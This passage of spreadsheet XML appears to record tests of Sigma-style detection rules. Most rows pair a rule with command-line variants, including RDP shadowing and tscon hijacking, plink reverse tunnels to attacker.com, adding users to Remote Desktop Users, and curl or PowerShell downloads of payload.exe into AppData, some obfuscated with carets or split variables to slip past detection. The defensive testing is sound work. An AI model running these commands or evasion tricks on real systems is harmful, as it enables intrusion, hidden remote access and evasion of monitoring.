      </c>
      <c r="C295" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity</t>
        </is>
      </c>
      <c r="D295" s="41" t="inlineStr">
        <is>
          <t>6ba5a05f-b095-4f0a-8654-b825f4f16334</t>
        </is>
      </c>
      <c r="E295" s="41" t="inlineStr">
        <is>
          <t>mstsc.exe "/shadow:1" "/noconsentprompt"</t>
        </is>
      </c>
      <c r="F295" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G295" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H295" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I295" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334); Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334)</t>
        </is>
      </c>
      <c r="J295" s="41" t="n"/>
      <c r="K295" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="41" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B296" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_rdp_hijack_shadowing</t>
        </is>
      </c>
      <c r="C296" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity</t>
        </is>
      </c>
      <c r="D296" s="41" t="inlineStr">
        <is>
          <t>6ba5a05f-b095-4f0a-8654-b825f4f16334</t>
        </is>
      </c>
      <c r="E296" s="41" t="inlineStr">
        <is>
          <t>mstsc.exe /shadow:"1" /noconsentprompt</t>
        </is>
      </c>
      <c r="F296" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G296" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H296" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I296" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334); Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334)</t>
        </is>
      </c>
      <c r="J296" s="41" t="n"/>
      <c r="K296" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="41" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B297" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_rdp_hijack_shadowing</t>
        </is>
      </c>
      <c r="C297" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity</t>
        </is>
      </c>
      <c r="D297" s="41" t="inlineStr">
        <is>
          <t>6ba5a05f-b095-4f0a-8654-b825f4f16334</t>
        </is>
      </c>
      <c r="E297" s="41" t="inlineStr">
        <is>
          <t>mstsc.exe /noconsentprompt /shadow:1</t>
        </is>
      </c>
      <c r="F297" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G297" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I297" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334); Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334)</t>
        </is>
      </c>
      <c r="J297" s="41" t="n"/>
      <c r="K297" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="41" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B298" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tscon_rdp_redirect</t>
        </is>
      </c>
      <c r="C298" s="41" t="inlineStr">
        <is>
          <t>Suspicious RDP Redirect Using TSCON</t>
        </is>
      </c>
      <c r="D298" s="41" t="inlineStr">
        <is>
          <t>f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb</t>
        </is>
      </c>
      <c r="E298" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /k tscon 1337 -dest:rdp-tcp#55</t>
        </is>
      </c>
      <c r="F298" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G298" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I298" s="41" t="n"/>
      <c r="J298" s="41" t="n"/>
      <c r="K298" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="41" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B299" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tscon_rdp_redirect</t>
        </is>
      </c>
      <c r="C299" s="41" t="inlineStr">
        <is>
          <t>Suspicious RDP Redirect Using TSCON</t>
        </is>
      </c>
      <c r="D299" s="41" t="inlineStr">
        <is>
          <t>f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb</t>
        </is>
      </c>
      <c r="E299" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /k tscon 1337 "/dest:rdp-tcp#55"</t>
        </is>
      </c>
      <c r="F299" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G299" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H299" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I299" s="41" t="n"/>
      <c r="J299" s="41" t="n"/>
      <c r="K299" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B300" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C300" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D300" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E300" s="41" t="inlineStr">
        <is>
          <t>plink.exe "-R" 3389:localhost:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F300" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G300" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H300" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I300" s="41" t="n"/>
      <c r="J300" s="41" t="n"/>
      <c r="K300" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B301" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C301" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D301" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E301" s="41" t="inlineStr">
        <is>
          <t>plink.exe	-R	3389:localhost:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F301" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G301" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H301" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I301" s="41" t="n"/>
      <c r="J301" s="41" t="n"/>
      <c r="K301" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B302" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C302" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D302" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E302" s="41" t="inlineStr">
        <is>
          <t>plink.exe -R3389:localhost:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F302" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G302" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H302" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I302" s="41" t="n"/>
      <c r="J302" s="41" t="n"/>
      <c r="K302" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B303" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C303" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D303" s="41" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E303" s="41" t="inlineStr">
        <is>
          <t>net localgroup "Remote Desktop Users" TEST-HOST -add</t>
        </is>
      </c>
      <c r="F303" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G303" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H303" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="41" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J303" s="41" t="n"/>
      <c r="K303" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B304" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C304" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D304" s="41" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E304" s="41" t="inlineStr">
        <is>
          <t>net localgroup "Remote Desktop Users" TEST-HOST "/add"</t>
        </is>
      </c>
      <c r="F304" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G304" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H304" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="41" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J304" s="41" t="n"/>
      <c r="K304" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B305" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C305" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D305" s="41" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E305" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c net localgroup "Remote Desktop Users" TEST-HOST /a^dd</t>
        </is>
      </c>
      <c r="F305" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G305" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H305" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I305" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J305" s="41" t="n"/>
      <c r="K305" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B306" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C306" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D306" s="41" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E306" s="41" t="inlineStr">
        <is>
          <t>net localgroup "Remote Desktop Users" TEST-HOST /add/</t>
        </is>
      </c>
      <c r="F306" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G306" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H306" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I306" s="41" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J306" s="41" t="n"/>
      <c r="K306" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="307" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="41" t="inlineStr">
        <is>
          <t>t1021.005</t>
        </is>
      </c>
      <c r="B307" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ultravnc_susp_execution</t>
        </is>
      </c>
      <c r="C307" s="41" t="inlineStr">
        <is>
          <t>Suspicious UltraVNC Execution</t>
        </is>
      </c>
      <c r="D307" s="41" t="inlineStr">
        <is>
          <t>871b9555-69ca-4993-99d3-35a59f9f3599</t>
        </is>
      </c>
      <c r="E307" s="41" t="inlineStr">
        <is>
          <t>vncviewer.exe -autoreconnect" " -connect" " -id:12345</t>
        </is>
      </c>
      <c r="F307" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G307" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H307" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I307" s="41" t="n"/>
      <c r="J307" s="41" t="n"/>
      <c r="K307" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="41" t="inlineStr">
        <is>
          <t>t1021.005</t>
        </is>
      </c>
      <c r="B308" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ultravnc_susp_execution</t>
        </is>
      </c>
      <c r="C308" s="41" t="inlineStr">
        <is>
          <t>Suspicious UltraVNC Execution</t>
        </is>
      </c>
      <c r="D308" s="41" t="inlineStr">
        <is>
          <t>871b9555-69ca-4993-99d3-35a59f9f3599</t>
        </is>
      </c>
      <c r="E308" s="41" t="inlineStr">
        <is>
          <t>vncviewer.exe /autoreconnect /connect /id:12345</t>
        </is>
      </c>
      <c r="F308" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G308" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H308" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I308" s="41" t="n"/>
      <c r="J308" s="41" t="n"/>
      <c r="K308" s="41" t="b">
        <v>0</v>
      </c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959"/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34.14" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="60" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6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4" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E2" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "svchost.exe --m^eshServiceName"</t>
        </is>
      </c>
      <c r="F2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B5" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C5" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D5" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E5" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B6" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C6" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D6" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E6" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B7" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C7" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D7" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E7" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B8" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C8" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D8" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E8" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B9" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C9" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D9" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E9" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E10" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B11" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C11" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D11" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E11" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B12" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C12" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D12" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E12" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:ON /C "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B13" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C13" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D13" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E13" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \"$env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="43" t="n"/>
      <c r="J13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
